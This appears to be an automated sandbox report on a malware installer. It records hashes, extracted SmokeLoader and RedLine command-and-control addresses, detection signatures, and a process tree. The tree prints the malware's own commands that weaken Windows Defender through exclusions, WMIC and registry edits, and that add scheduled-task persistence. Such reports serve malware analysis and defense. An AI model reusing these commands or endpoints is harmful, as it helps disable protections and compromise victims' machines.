Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
17s -
max time network
603s -
platform
windows7_x64 -
resource
win7-ja-20210916 -
submitted
20-09-2021 04:42
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
janesam
65.108.20.195:6774
Extracted
metasploit
windows/single_exec
Extracted
icedid
3162718704
Signatures
-
Glupteba Payload 2 IoCs
resource yara_rule behavioral1/memory/2892-367-0x0000000002E70000-0x000000000378E000-memory.dmp family_glupteba behavioral1/memory/2892-368-0x0000000000400000-0x0000000000D39000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 676 2736 rundll32.exe 123 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1112 2736 rundll32.exe 123 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral1/memory/1260-228-0x0000000000660000-0x000000000067D000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral1/files/0x000500000001320d-97.dat family_socelars behavioral1/files/0x000500000001320d-162.dat family_socelars behavioral1/files/0x000500000001320d-147.dat family_socelars -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
resource yara_rule behavioral1/files/0x0005000000013064-70.dat aspack_v212_v242 behavioral1/files/0x0005000000013064-71.dat aspack_v212_v242 behavioral1/files/0x0006000000012675-72.dat aspack_v212_v242 behavioral1/files/0x0006000000012675-73.dat aspack_v212_v242 behavioral1/files/0x000500000001307f-76.dat aspack_v212_v242 behavioral1/files/0x000500000001307f-77.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
pid Process 1716 setup_installer.exe 1776 setup_install.exe 2036 Sun19e4ade31b2a.exe 1468 Sun1917b8fb5f09db8.exe 1172 Sun191101c1aaa.exe 1764 Sun1908b94df837b3158.exe 1260 Sun195a1614ec24e6a.exe 984 Sun19262b9e49ad.exe 704 Sun19de8ff4b6aefeb8.exe 1432 Sun1905815e51282417.exe 1036 Sun193fda712d9f1.exe 2108 Sun1966fb31dd5a07.exe 2136 Sun198361825f4.exe 2320 Sun1966fb31dd5a07.tmp -
Loads dropped DLL 41 IoCs
pid Process 1516 setup_x86_x64_install.exe 1716 setup_installer.exe 1716 setup_installer.exe 1716 setup_installer.exe 1716 setup_installer.exe 1716 setup_installer.exe 1716 setup_installer.exe 1776 setup_install.exe 1776 setup_install.exe 1776 setup_install.exe 1776 setup_install.exe 1776 setup_install.exe 1776 setup_install.exe 1776 setup_install.exe 1776 setup_install.exe 1616 cmd.exe 856 cmd.exe 1708 cmd.exe 1708 cmd.exe 1924 cmd.exe 1316 cmd.exe 1468 Sun1917b8fb5f09db8.exe 1468 Sun1917b8fb5f09db8.exe 2040 cmd.exe 1764 Sun1908b94df837b3158.exe 1764 Sun1908b94df837b3158.exe 1096 cmd.exe 1096 cmd.exe 1636 cmd.exe 1488 cmd.exe 432 cmd.exe 1884 cmd.exe 1260 Sun195a1614ec24e6a.exe 1260 Sun195a1614ec24e6a.exe 2108 Sun1966fb31dd5a07.exe 984 Sun19262b9e49ad.exe 2108 Sun1966fb31dd5a07.exe 984 Sun19262b9e49ad.exe 704 Sun19de8ff4b6aefeb8.exe 704 Sun19de8ff4b6aefeb8.exe 2108 Sun1966fb31dd5a07.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3264 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 174 ip-api.com 271 ipinfo.io 272 ipinfo.io 205 api.2ip.ua 206 api.2ip.ua 304 ipinfo.io 305 ipinfo.io 12 ip-api.com 33 ipinfo.io 34 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 8 IoCs
pid pid_target Process procid_target 2408 3040 WerFault.exe 67 1108 2028 WerFault.exe 71 3744 2344 WerFault.exe 119 3984 3440 WerFault.exe 134 3012 1356 WerFault.exe 2132 2136 WerFault.exe 46 4124 2728 WerFault.exe 122 4856 2544 WerFault.exe 88 -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3540 schtasks.exe 3108 schtasks.exe 4492 schtasks.exe 2148 schtasks.exe 2436 schtasks.exe 4576 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3276 timeout.exe 3416 timeout.exe -
Kills process with taskkill 6 IoCs
pid Process 4744 taskkill.exe 2228 taskkill.exe 4304 taskkill.exe 3656 taskkill.exe 4932 taskkill.exe 4548 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 984 Sun19262b9e49ad.exe Token: SeAssignPrimaryTokenPrivilege 984 Sun19262b9e49ad.exe Token: SeLockMemoryPrivilege 984 Sun19262b9e49ad.exe Token: SeIncreaseQuotaPrivilege 984 Sun19262b9e49ad.exe Token: SeMachineAccountPrivilege 984 Sun19262b9e49ad.exe Token: SeTcbPrivilege 984 Sun19262b9e49ad.exe Token: SeSecurityPrivilege 984 Sun19262b9e49ad.exe Token: SeTakeOwnershipPrivilege 984 Sun19262b9e49ad.exe Token: SeLoadDriverPrivilege 984 Sun19262b9e49ad.exe Token: SeSystemProfilePrivilege 984 Sun19262b9e49ad.exe Token: SeSystemtimePrivilege 984 Sun19262b9e49ad.exe Token: SeProfSingleProcessPrivilege 984 Sun19262b9e49ad.exe Token: SeIncBasePriorityPrivilege 984 Sun19262b9e49ad.exe Token: SeCreatePagefilePrivilege 984 Sun19262b9e49ad.exe Token: SeCreatePermanentPrivilege 984 Sun19262b9e49ad.exe Token: SeBackupPrivilege 984 Sun19262b9e49ad.exe Token: SeRestorePrivilege 984 Sun19262b9e49ad.exe Token: SeShutdownPrivilege 984 Sun19262b9e49ad.exe Token: SeDebugPrivilege 984 Sun19262b9e49ad.exe Token: SeAuditPrivilege 984 Sun19262b9e49ad.exe Token: SeSystemEnvironmentPrivilege 984 Sun19262b9e49ad.exe Token: SeChangeNotifyPrivilege 984 Sun19262b9e49ad.exe Token: SeRemoteShutdownPrivilege 984 Sun19262b9e49ad.exe Token: SeUndockPrivilege 984 Sun19262b9e49ad.exe Token: SeSyncAgentPrivilege 984 Sun19262b9e49ad.exe Token: SeEnableDelegationPrivilege 984 Sun19262b9e49ad.exe Token: SeManageVolumePrivilege 984 Sun19262b9e49ad.exe Token: SeImpersonatePrivilege 984 Sun19262b9e49ad.exe Token: SeCreateGlobalPrivilege 984 Sun19262b9e49ad.exe Token: 31 984 Sun19262b9e49ad.exe Token: 32 984 Sun19262b9e49ad.exe Token: 33 984 Sun19262b9e49ad.exe Token: 34 984 Sun19262b9e49ad.exe Token: 35 984 Sun19262b9e49ad.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1516 wrote to memory of 1716 1516 setup_x86_x64_install.exe 29 PID 1516 wrote to memory of 1716 1516 setup_x86_x64_install.exe 29 PID 1516 wrote to memory of 1716 1516 setup_x86_x64_install.exe 29 PID 1516 wrote to memory of 1716 1516 setup_x86_x64_install.exe 29 PID 1516 wrote to memory of 1716 1516 setup_x86_x64_install.exe 29 PID 1516 wrote to memory of 1716 1516 setup_x86_x64_install.exe 29 PID 1516 wrote to memory of 1716 1516 setup_x86_x64_install.exe 29 PID 1716 wrote to memory of 1776 1716 setup_installer.exe 30 PID 1716 wrote to memory of 1776 1716 setup_installer.exe 30 PID 1716 wrote to memory of 1776 1716 setup_installer.exe 30 PID 1716 wrote to memory of 1776 1716 setup_installer.exe 30 PID 1716 wrote to memory of 1776 1716 setup_installer.exe 30 PID 1716 wrote to memory of 1776 1716 setup_installer.exe 30 PID 1716 wrote to memory of 1776 1716 setup_installer.exe 30 PID 1776 wrote to memory of 1604 1776 setup_install.exe 32 PID 1776 wrote to memory of 1604 1776 setup_install.exe 32 PID 1776 wrote to memory of 1604 1776 setup_install.exe 32 PID 1776 wrote to memory of 1604 1776 setup_install.exe 32 PID 1776 wrote to memory of 1604 1776 setup_install.exe 32 PID 1776 wrote to memory of 1604 1776 setup_install.exe 32 PID 1776 wrote to memory of 1604 1776 setup_install.exe 32 PID 1776 wrote to memory of 1616 1776 setup_install.exe 33 PID 1776 wrote to memory of 1616 1776 setup_install.exe 33 PID 1776 wrote to memory of 1616 1776 setup_install.exe 33 PID 1776 wrote to memory of 1616 1776 setup_install.exe 33 PID 1776 wrote to memory of 1616 1776 setup_install.exe 33 PID 1776 wrote to memory of 1616 1776 setup_install.exe 33 PID 1776 wrote to memory of 1616 1776 setup_install.exe 33 PID 1776 wrote to memory of 1316 1776 setup_install.exe 34 PID 1776 wrote to memory of 1316 1776 setup_install.exe 34 PID 1776 wrote to memory of 1316 1776 setup_install.exe 34 PID 1776 wrote to memory of 1316 1776 setup_install.exe 34 PID 1776 wrote to memory of 1316 1776 setup_install.exe 34 PID 1776 wrote to memory of 1316 1776 setup_install.exe 34 PID 1776 wrote to memory of 1316 1776 setup_install.exe 34 PID 1776 wrote to memory of 1488 1776 setup_install.exe 35 PID 1776 wrote to memory of 1488 1776 setup_install.exe 35 PID 1776 wrote to memory of 1488 1776 setup_install.exe 35 PID 1776 wrote to memory of 1488 1776 setup_install.exe 35 PID 1776 wrote to memory of 1488 1776 setup_install.exe 35 PID 1776 wrote to memory of 1488 1776 setup_install.exe 35 PID 1776 wrote to memory of 1488 1776 setup_install.exe 35 PID 1776 wrote to memory of 856 1776 setup_install.exe 36 PID 1776 wrote to memory of 856 1776 setup_install.exe 36 PID 1776 wrote to memory of 856 1776 setup_install.exe 36 PID 1776 wrote to memory of 856 1776 setup_install.exe 36 PID 1776 wrote to memory of 856 1776 setup_install.exe 36 PID 1776 wrote to memory of 856 1776 setup_install.exe 36 PID 1776 wrote to memory of 856 1776 setup_install.exe 36 PID 1776 wrote to memory of 1708 1776 setup_install.exe 37 PID 1776 wrote to memory of 1708 1776 setup_install.exe 37 PID 1776 wrote to memory of 1708 1776 setup_install.exe 37 PID 1776 wrote to memory of 1708 1776 setup_install.exe 37 PID 1776 wrote to memory of 1708 1776 setup_install.exe 37 PID 1776 wrote to memory of 1708 1776 setup_install.exe 37 PID 1776 wrote to memory of 1708 1776 setup_install.exe 37 PID 1776 wrote to memory of 1096 1776 setup_install.exe 38 PID 1776 wrote to memory of 1096 1776 setup_install.exe 38 PID 1776 wrote to memory of 1096 1776 setup_install.exe 38 PID 1776 wrote to memory of 1096 1776 setup_install.exe 38 PID 1776 wrote to memory of 1096 1776 setup_install.exe 38 PID 1776 wrote to memory of 1096 1776 setup_install.exe 38 PID 1776 wrote to memory of 1096 1776 setup_install.exe 38 PID 1776 wrote to memory of 1924 1776 setup_install.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Users\Admin\AppData\Local\Temp\7zS4B632923\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4B632923\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1604
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:240
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Loads dropped DLL
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1468 -
C:\Users\Admin\Documents\LA1zOt2gGBQ72WZXUQ9L9eDY.exe"C:\Users\Admin\Documents\LA1zOt2gGBQ72WZXUQ9L9eDY.exe"6⤵PID:2696
-
-
C:\Users\Admin\Documents\vnwODiRBHcb1XVI1gIUBDzZE.exe"C:\Users\Admin\Documents\vnwODiRBHcb1XVI1gIUBDzZE.exe"6⤵PID:2328
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\vnwODiRBHcb1XVI1gIUBDzZE.exe"7⤵PID:1420
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:3276
-
-
-
-
C:\Users\Admin\Documents\tSW1eTxNxipuvXtziEPUqLFS.exe"C:\Users\Admin\Documents\tSW1eTxNxipuvXtziEPUqLFS.exe"6⤵PID:1724
-
-
C:\Users\Admin\Documents\jjo7uCY_fl7moe2RIRaRD24x.exe"C:\Users\Admin\Documents\jjo7uCY_fl7moe2RIRaRD24x.exe"6⤵PID:2528
-
-
C:\Users\Admin\Documents\acHqoBRbNPS6vlD3u2WEkKN4.exe"C:\Users\Admin\Documents\acHqoBRbNPS6vlD3u2WEkKN4.exe"6⤵PID:2480
-
-
C:\Users\Admin\Documents\qiQDN0GLbs9CeKZB__R_iDez.exe"C:\Users\Admin\Documents\qiQDN0GLbs9CeKZB__R_iDez.exe"6⤵PID:988
-
C:\Users\Admin\Documents\qiQDN0GLbs9CeKZB__R_iDez.exeC:\Users\Admin\Documents\qiQDN0GLbs9CeKZB__R_iDez.exe7⤵PID:3736
-
-
-
C:\Users\Admin\Documents\NfGJkFtlNWyAPd5Ze5ZRBvdT.exe"C:\Users\Admin\Documents\NfGJkFtlNWyAPd5Ze5ZRBvdT.exe"6⤵PID:1632
-
-
C:\Users\Admin\Documents\MIegBJOT1pehU5BDXW6GvHza.exe"C:\Users\Admin\Documents\MIegBJOT1pehU5BDXW6GvHza.exe"6⤵PID:1184
-
C:\Users\Admin\Documents\MIegBJOT1pehU5BDXW6GvHza.exe"C:\Users\Admin\Documents\MIegBJOT1pehU5BDXW6GvHza.exe"7⤵PID:2348
-
-
-
C:\Users\Admin\Documents\eh7yucA6kVf2mFwGelFHzMRn.exe"C:\Users\Admin\Documents\eh7yucA6kVf2mFwGelFHzMRn.exe"6⤵PID:1648
-
-
C:\Users\Admin\Documents\azBjQPXORRw7kVQWY2P81DOX.exe"C:\Users\Admin\Documents\azBjQPXORRw7kVQWY2P81DOX.exe"6⤵PID:2460
-
C:\Users\Admin\Documents\azBjQPXORRw7kVQWY2P81DOX.exeC:\Users\Admin\Documents\azBjQPXORRw7kVQWY2P81DOX.exe7⤵PID:3704
-
-
C:\Users\Admin\Documents\azBjQPXORRw7kVQWY2P81DOX.exeC:\Users\Admin\Documents\azBjQPXORRw7kVQWY2P81DOX.exe7⤵PID:4036
-
-
-
C:\Users\Admin\Documents\1n1mEB_1YwxDotn7E0X276WC.exe"C:\Users\Admin\Documents\1n1mEB_1YwxDotn7E0X276WC.exe"6⤵PID:2544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 9007⤵
- Program crash
PID:4856
-
-
-
C:\Users\Admin\Documents\m29kaX9kV_PKNEcMCy9RFtpu.exe"C:\Users\Admin\Documents\m29kaX9kV_PKNEcMCy9RFtpu.exe"6⤵PID:2548
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:2148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:2436
-
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵PID:4384
-
C:\Users\Admin\Documents\WLAWzfaZYqMZdruIP6LbFcSl.exe"C:\Users\Admin\Documents\WLAWzfaZYqMZdruIP6LbFcSl.exe"8⤵PID:4328
-
-
C:\Users\Admin\Documents\krMVkP8daoPpkq7hFe7KhyJI.exe"C:\Users\Admin\Documents\krMVkP8daoPpkq7hFe7KhyJI.exe" /mixtwo8⤵PID:4896
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "krMVkP8daoPpkq7hFe7KhyJI.exe" /f & erase "C:\Users\Admin\Documents\krMVkP8daoPpkq7hFe7KhyJI.exe" & exit9⤵PID:3300
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "krMVkP8daoPpkq7hFe7KhyJI.exe" /f10⤵
- Kills process with taskkill
PID:4932
-
-
-
-
C:\Users\Admin\Documents\mIqFtsGuAnBubwTAJeknNhBs.exe"C:\Users\Admin\Documents\mIqFtsGuAnBubwTAJeknNhBs.exe"8⤵PID:4956
-
-
C:\Users\Admin\Documents\B3Y3bjhw0qwRYGXUCnJJjBRW.exe"C:\Users\Admin\Documents\B3Y3bjhw0qwRYGXUCnJJjBRW.exe"8⤵PID:4388
-
C:\Users\Admin\AppData\Local\Temp\7zS99DE.tmp\Install.exe.\Install.exe9⤵PID:564
-
C:\Users\Admin\AppData\Local\Temp\7zSAF42.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵PID:2628
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵PID:2148
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:1500
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:3380
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:4540
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:2112
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:1520
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:2564
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:4896
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:1420
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:4008
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:4812
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:4888
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:2740
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:2224
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:524
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:1744
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:3944
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵PID:3656
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵PID:2244
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵PID:4244
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵PID:5020
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵PID:2476
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵PID:1592
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵PID:4680
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵PID:4048
-
-
-
-
